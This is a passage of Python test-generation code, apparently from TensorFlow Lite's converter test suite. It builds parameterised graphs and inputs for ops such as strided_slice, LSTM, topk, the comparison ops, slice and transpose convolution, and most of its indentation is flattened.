def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.squeeze(input_tensor, axis=parameters["axis"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=12)
@register_make_test_function()
def make_squeeze_transpose_tests(options):
"""Make a set of tests to do squeeze followed by transpose."""
test_parameters = [{
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1, 4, 10, 1]],
"axis": [[-1], [3]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.squeeze(input_tensor, axis=parameters["axis"])
out = tf.transpose(out, perm=[1, 2])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=0)
def _make_strided_slice_tests(options, test_parameters,
expected_tf_failures=0):
"""Utility function to make strided_slice_tests based on parameters."""
  def build_graph(parameters):
    """Build graph for strided_slice test."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
if parameters["constant_indices"]:
begin = parameters["begin"]
end = parameters["end"]
strides = parameters["strides"]
tensors = [input_tensor]
else:
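      # Feed begin/end (and strides, when present) as runtime tensors instead
      # of constants.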
begin = tf.placeholder(
dtype=parameters["index_type"],
name="begin",
shape=[len(parameters["input_shape"])])
end = tf.placeholder(
dtype=parameters["index_type"],
name="end",
shape=[len(parameters["input_shape"])])
strides = (
tf.placeholder(
dtype=parameters["index_type"],
name="strides",
shape=[len(parameters["input_shape"])])
if parameters["strides"] is not None else None)
tensors = [input_tensor, begin, end]
if strides is not None:
tensors.append(strides)
out = tf.strided_slice(
input_tensor,
begin,
end,
strides,
begin_mask=parameters["begin_mask"],
end_mask=parameters["end_mask"])
return tensors, [out]
  def build_inputs(parameters, sess, inputs, outputs):
    """Build inputs for strided_slice test."""
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
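    # _TF_TYPE_INFO[...][0] is the numpy dtype matching the TF index dtype.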
index_type = _TF_TYPE_INFO[parameters["index_type"]][0]
values = [input_values]
if not parameters["constant_indices"]:
begin_values = np.array(parameters["begin"]).astype(index_type)
end_values = np.array(parameters["end"]).astype(index_type)
stride_values = (
np.array(parameters["strides"]).astype(index_type)
if parameters["strides"] is not None else None)
values.append(begin_values)
values.append(end_values)
if stride_values is not None:
values.append(stride_values)
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
@register_make_test_function()
def make_strided_slice_tests(options):
"""Make a set of tests to do strided_slice."""
# TODO(soroosh): add test/support for uint8.
test_parameters = [
# 4-D (basic cases with const/non-const indices).
{
"dtype": [tf.float32, tf.int32, tf.int64],
"index_type": [tf.int32],
"input_shape": [[12, 2, 2, 5]],
"strides": [None, [2, 1, 3, 1]],
"begin": [[0, 0, 0, 0]],
"end": [[12, 2, 2, 5]],
"begin_mask": [None],
"end_mask": [None],
"shrink_axis_mask": [None],
"constant_indices": [False, True],
},
# 4-D with non-trivial begin & end.
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[12, 2, 2, 5]],
"begin": [[0, 0, 0, 0], [1, 0, 1, 0]],
"end": [[8, 2, 2, 3], [12, 2, 2, 5]],
"strides": [None, [2, 1, 3, 1]],
"begin_mask": [None, 8],
"end_mask": [None, 3],
"shrink_axis_mask": [None, 15, -1],
"constant_indices": [True],
},
      # Begin, end and strides have a rank different from the input shape.
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[12, 2, 2, 5]],
"begin": [[0]],
"end": [[1]],
"strides": [None, [1]],
"begin_mask": [0],
"end_mask": [0],
"shrink_axis_mask": [1],
"constant_indices": [True],
},
# 2-D
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[2, 3]],
"begin": [[0, 0]],
"end": [[2, 2]],
"strides": [None, [2, 2]],
"begin_mask": [None, 1, 2],
"end_mask": [None, 1, 2],
"shrink_axis_mask": [None, 1, 2, 3, -1],
"constant_indices": [False, True],
},
# Negative strides
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[2, 3]],
"begin": [[0, -1]],
"end": [[2, -3]],
"strides": [[1, -1]],
"begin_mask": [None, 1, 2],
"end_mask": [None, 1, 2],
"shrink_axis_mask": [None, 1, 2, 3, -1],
"constant_indices": [False],
},
]
_make_strided_slice_tests(options, test_parameters, expected_tf_failures=2)
@register_make_test_function()
def make_strided_slice_1d_exhaustive_tests(options):
"""Make a set of exhaustive tests for 1D strided_slice."""
test_parameters = [
# 1-D Exhaustive
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[3]],
"begin": [[-2], [-1], [0], [1], [2]],
"end": [[-2], [-1], [0], [1], [2]],
"strides": [[-2], [-1], [1], [2]],
"begin_mask": [0, 1],
"end_mask": [0, 1],
"shrink_axis_mask": [0],
"constant_indices": [False],
},
]
_make_strided_slice_tests(options, test_parameters)
# For verifying https://github.com/tensorflow/tensorflow/issues/23599
# TODO(chaomei): refactor the test to cover more cases, like negative stride,
# negative array index etc.
@register_make_test_function()
def make_resolve_constant_strided_slice_tests(options):
"""Make a set of tests to show strided_slice yields incorrect results."""
test_parameters = [{
"unused_iteration_counter": [1],
}]
def build_graph(parameters):
"""Build the strided_slice op testing graph."""
del parameters
input_values = tf.placeholder(dtype=tf.float32, shape=[4, 2])
data = tf.constant([[0, 1, 2, 3],
[4, 5, 6, 7],
[8, 9, 10, 11],
[12, 13, 14, 15]], tf.float32)
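    # data[:, :2] is a strided slice of a constant, which exercises the
    # converter's constant resolution; the add ties it to the placeholder
    # input.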
return [input_values], [input_values + data[:, :2]]
def build_inputs(parameters, sess, inputs, outputs):
del parameters
input_values = np.zeros([4, 2], dtype=np.float32)
return [input_values], sess.run(
outputs, feed_dict={inputs[0]: input_values})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_lstm_tests(options):
  """Make a set of tests to do a basic LSTM cell."""
test_parameters = [
{
"dtype": [tf.float32],
"num_batchs": [1],
"time_step_size": [1],
"input_vec_size": [3],
"num_cells": [4],
"split_tflite_lstm_inputs": [False],
},
]
def build_graph(parameters):
"""Build a simple graph with BasicLSTMCell."""
num_batchs = parameters["num_batchs"]
time_step_size = parameters["time_step_size"]
input_vec_size = parameters["input_vec_size"]
num_cells = parameters["num_cells"]
inputs_after_split = []
for i in xrange(time_step_size):
one_timestamp_input = tf.placeholder(
dtype=parameters["dtype"],
name="split_{}".format(i),
shape=[num_batchs, input_vec_size])
inputs_after_split.append(one_timestamp_input)
    # Currently the lstm identifier has a few limitations: it only supports
    # forget_bias == 0 and an inner state activation of tanh.
# TODO(zhixianyan): Add another test with forget_bias == 1.
# TODO(zhixianyan): Add another test with relu as activation.
lstm_cell = tf.contrib.rnn.BasicLSTMCell(
num_cells, forget_bias=0.0, state_is_tuple=True)
cell_outputs, _ = rnn.static_rnn(
lstm_cell, inputs_after_split, dtype=tf.float32)
out = cell_outputs[-1]
return inputs_after_split, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Feed inputs, assign variables, and freeze graph."""
with tf.variable_scope("", reuse=True):
kernel = tf.get_variable("rnn/basic_lstm_cell/kernel")
bias = tf.get_variable("rnn/basic_lstm_cell/bias")
kernel_values = create_tensor_data(
parameters["dtype"], [kernel.shape[0], kernel.shape[1]], -1, 1)
bias_values = create_tensor_data(parameters["dtype"], [bias.shape[0]], 0,
1)
sess.run(tf.group(kernel.assign(kernel_values), bias.assign(bias_values)))
num_batchs = parameters["num_batchs"]
time_step_size = parameters["time_step_size"]
input_vec_size = parameters["input_vec_size"]
input_values = []
for _ in xrange(time_step_size):
tensor_data = create_tensor_data(parameters["dtype"],
[num_batchs, input_vec_size], 0, 1)
input_values.append(tensor_data)
out = sess.run(outputs, feed_dict=dict(zip(inputs, input_values)))
return input_values, out
# TODO(zhixianyan): Automatically generate rnn_states for lstm cell.
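  # rnn_states describes the LSTM state arrays and their back-edge source
  # arrays so the converter can wire up the recurrent state.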
extra_toco_options = ExtraTocoOptions()
extra_toco_options.rnn_states = (
"{state_array:rnn/BasicLSTMCellZeroState/zeros,"
"back_edge_source_array:rnn/basic_lstm_cell/Add_1,size:4},"
"{state_array:rnn/BasicLSTMCellZeroState/zeros_1,"
"back_edge_source_array:rnn/basic_lstm_cell/Mul_2,size:4}")
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
extra_toco_options,
use_frozen_graph=True)
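# l2_pool is expressed as sqrt(avg_pool(square(x))).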
def make_l2_pool(input_tensor, ksize, strides, padding, data_format):
  """Given an input, build a sequence of TensorFlow ops that produce l2pool."""
return tf.sqrt(tf.nn.avg_pool(
tf.square(input_tensor), ksize=ksize, strides=strides,
padding=padding, data_format=data_format))
@register_make_test_function()
def make_topk_tests(options):
"""Make a set of tests to do topk."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[10], [5, 20]],
"input_k": [None, 1, 3],
}]
def build_graph(parameters):
"""Build the topk op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
if parameters["input_k"] is not None:
k = tf.placeholder(dtype=tf.int32, name="input_k", shape=[])
inputs = [input_value, k]
else:
k = tf.constant(3, name="k")
inputs = [input_value]
out = tf.nn.top_k(input_value, k)
return inputs, [out[1]]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
if parameters["input_k"] is not None:
k = np.array(parameters["input_k"], dtype=np.int32)
return [input_value, k], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value, k])))
else:
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_arg_min_max_tests(options):
"""Make a set of tests to do arg_max."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[], [1, 1, 1, 3], [2, 3, 4, 5], [2, 3, 3], [5, 5], [10]],
"output_type": [tf.int32, tf.int64],
"is_arg_max": [True],
}]
  def build_graph(parameters):
    """Build the arg_min/arg_max op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
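    # Choose a random valid axis for each generated example (0 for scalars).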
axis = random.randint(0, max(len(parameters["input_shape"]) - 1, 0))
if parameters["is_arg_max"]:
out = tf.arg_max(input_value, axis, output_type=parameters["output_type"])
else:
out = tf.arg_min(input_value, axis, output_type=parameters["output_type"])
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=4)
@register_make_test_function()
def make_equal_tests(options):
"""Make a set of tests to do equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([], []),
([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_not_equal_tests(options):
"""Make a set of tests to do not equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
  def build_graph(parameters):
    """Build the not_equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.not_equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_greater_tests(options):
"""Make a set of tests to do greater."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the greater op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.greater(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_greater_equal_tests(options):
"""Make a set of tests to do greater_equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the greater_equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.greater_equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_less_tests(options):
"""Make a set of tests to do less."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the less op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.less(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_less_equal_tests(options):
"""Make a set of tests to do less_equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the less_equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.less_equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_floor_tests(options):
"""Make a set of tests to do floor."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the floor op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = tf.floor(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_ceil_tests(options):
"""Make a set of tests to do ceil."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the ceil op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = tf.ceil(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_round_tests(options):
  """Make a set of tests to do round."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the round op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = tf.round(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_neg_tests(options):
"""Make a set of tests to do neg."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [5], []],
}]
def build_graph(parameters):
"""Build the neg op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.negative(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [values], sess.run(outputs, feed_dict=dict(zip(inputs, [values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_zeros_like_tests(options):
"""Make a set of tests to do zeros_like."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the zeros_like op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
zeros = tf.zeros_like(input_tensor)
    # This maximum node is here so that toco can perform the
    # constants-propagation through the above zeros_like, which it can't do
    # if the output of the zeros_like is an output of the whole graph
    # (graph outputs can't be constants). If toco does not perform such
    # constants-propagation then the resulting tflite graph retains the
    # zeros_like as a Fill op, which is unsupported by TFLite, even as a
    # custom op.
out = tf.maximum(zeros, input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [values], sess.run(outputs, feed_dict=dict(zip(inputs, [values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
def _make_elementwise_tests(op):
"""Make a set of tests to do element-wise operations."""
def f(options):
"""Actual function that generates examples."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the unary op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = op(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
return f
@register_make_test_function()
def make_sin_tests(options):
"""Make a set of tests to do sin."""
return _make_elementwise_tests(tf.sin)(options)
@register_make_test_function()
def make_log_tests(options):
"""Make a set of tests to do log."""
return _make_elementwise_tests(tf.log)(options)
@register_make_test_function()
def make_sqrt_tests(options):
"""Make a set of tests to do sqrt."""
return _make_elementwise_tests(tf.sqrt)(options)
@register_make_test_function()
def make_rsqrt_tests(options):
"""Make a set of tests to do 1/sqrt."""
return _make_elementwise_tests(tf.rsqrt)(options)
@register_make_test_function()
def make_square_tests(options):
"""Make a set of tests to do square."""
return _make_elementwise_tests(tf.square)(options)
@register_make_test_function()
def make_where_tests(options):
"""Make a set of tests to do where."""
test_parameters = [
{
"input_dtype": [tf.float32, tf.int32],
"input_shape_set": [([1, 2, 3, 4], [1, 2, 3, 4]),],
"use_where_v2": [False, True],
},
{
"input_dtype": [tf.float32, tf.int32],
"input_shape_set": [([1, 2, 3, 4], [1, 2, 3, 1]),],
"use_where_v2": [True],
},
]
def build_graph(parameters):
"""Build the where op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_set"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input3",
shape=parameters["input_shape_set"][1])
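    # Use an element-wise comparison as the condition for the where op.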
less = tf.less(input_value1, input_value2)
where = tf.where_v2 if parameters["use_where_v2"] else tf.where
out = where(less, input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_set"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_set"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_slice_tests(options):
"""Make a set of tests to do slice."""
# TODO(renjieliu): add test/support for uint8.
test_parameters = [
# 4-D
{
"dtype": [tf.float32, tf.int32, tf.int64, tf.string],
"index_type": [tf.int32, tf.int64],
"input_shape": [[12, 2, 2, 5]],
"begin": [[0, 0, 0, 0], [1, 0, 1, 0]],
"size": [[8, 2, 2, 3], [11, 2, 1, 5]],
},
# 2-D
{
"dtype": [tf.float32, tf.int32, tf.int64, tf.string],
"index_type": [tf.int32, tf.int64],
"input_shape": [[2, 3]],
"begin": [[0, 0], [1, 0]],
"size": [[2, 3], [2, 2]],
},
# 4-D with size -1
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[4, 4, 4, 4]],
"begin": [[0, 0, 0, 0], [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0],
[0, 0, 0, 1]],
"size": [[-1, 1, 1, 1], [1, -1, 1, 1], [1, 1, -1, 1], [1, 1, 1, -1]],
},
]
def build_graph(parameters):
"""Build graph for slice test."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
begin = tf.placeholder(
dtype=parameters["index_type"],
name="begin",
shape=[len(parameters["input_shape"])])
size = tf.placeholder(
dtype=parameters["index_type"],
name="size",
shape=[len(parameters["input_shape"])])
tensors = [input_tensor, begin, size]
out = tf.slice(input_tensor, begin, size)
return tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build inputs for slice test."""
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
index_type = _TF_TYPE_INFO[parameters["index_type"]][0]
begin_values = np.array(parameters["begin"]).astype(index_type)
size_values = np.array(parameters["size"]).astype(index_type)
values = [input_values, begin_values, size_values]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=24)
@register_make_test_function()
def make_conv2d_transpose_tests(options):
  """Make a set of tests to do conv2d_transpose."""
test_parameters = [{
"input_shape": [[1, 50, 54, 3]],
"filter_shape": [[1, 1, 8, 3], [1, 2, 8, 3], [1, 3, 8, 3], [1, 4, 8, 3]],
"output_shape": [[1, 100, 108, 8]],
"dynamic_output_shape": [True, False],
}, {
"input_shape": [[1, 16, 1, 512]],
"filter_shape": [[4, 1, 512, 512]],
"output_shape": [[1, 32, 1, 512]],
"dynamic_output_shape": [True, False],
}, {
"input_shape": [[1, 128, 128, 1]],
"filter_shape": [[4, 4, 1, 1]],
"output_shape": [[1, 256, 256, 1]],
"dynamic_output_shape": [True, False],
}]
def build_graph(parameters):
"""Build a transpose_conv graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
filter_tensor = tf.placeholder(
dtype=tf.float32, name="filter", shape=parameters["filter_shape"])
input_tensors = [input_tensor, filter_tensor]
if parameters["dynamic_output_shape"]:
output_shape = tf.placeholder(dtype=tf.int32, shape=[4])
input_tensors.append(output_shape)
else:
output_shape = parameters["output_shape"]
out = tf.nn.conv2d_transpose(
input_tensor,
filter_tensor,
output_shape=output_shape,
padding="SAME",
strides=(1, 2, 2, 1))
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(np.float32, parameters["input_shape"]),
create_tensor_data(np.float32, parameters["filter_shape"])
]
if parameters["dynamic_output_shape"]:
values.append(np.array(parameters["output_shape"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# Since computing the output_shape for the input_sizes argument of
# tf.nn.conv2d_transpose is fairly complicated, we first perform a "conv2d"
# operation to get the output, then feed that output into
# tf.nn.conv2d_backprop_input.
# This test therefore depends on the correctness of the "conv2d" operation.
@register_make_test_function()
def make_transpose_conv_tests(options):
"""Make a set of tests to do transpose_conv."""
# Tensorflow only supports equal strides
test_parameters = [{
"input_shape": [[1, 3, 4, 1], [1, 10, 10, 3], [3, 20, 20, 1]],
"filter_size": [[1, 1], [1, 2], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 3, 3, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"],
"channel_multiplier": [1, 2],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_size"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a transpose_conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
filter_input = tf.placeholder(
dtype=tf.float32, name="filter", shape=filter_shape)
conv_outputs = tf.nn.conv2d(
input_tensor,
filter_input,
strides=parameters["strides"],
padding=parameters["padding"],
data_format=parameters["data_format"])
out = tf.nn.conv2d_backprop_input(
input_shape,
filter_input,
conv_outputs,
strides=parameters["strides"],
padding=parameters["padding"],
data_format=parameters["data_format"])
input_tensors = [input_tensor, filter_input]
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
input_shape, filter_shape = get_tensor_shapes(parameters)
values = [
create_tensor_data(np.float32, input_shape),
create_tensor_data(np.float32, filter_shape)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_tile_tests(options):
"""Make a set of tests to do tile."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.bool],
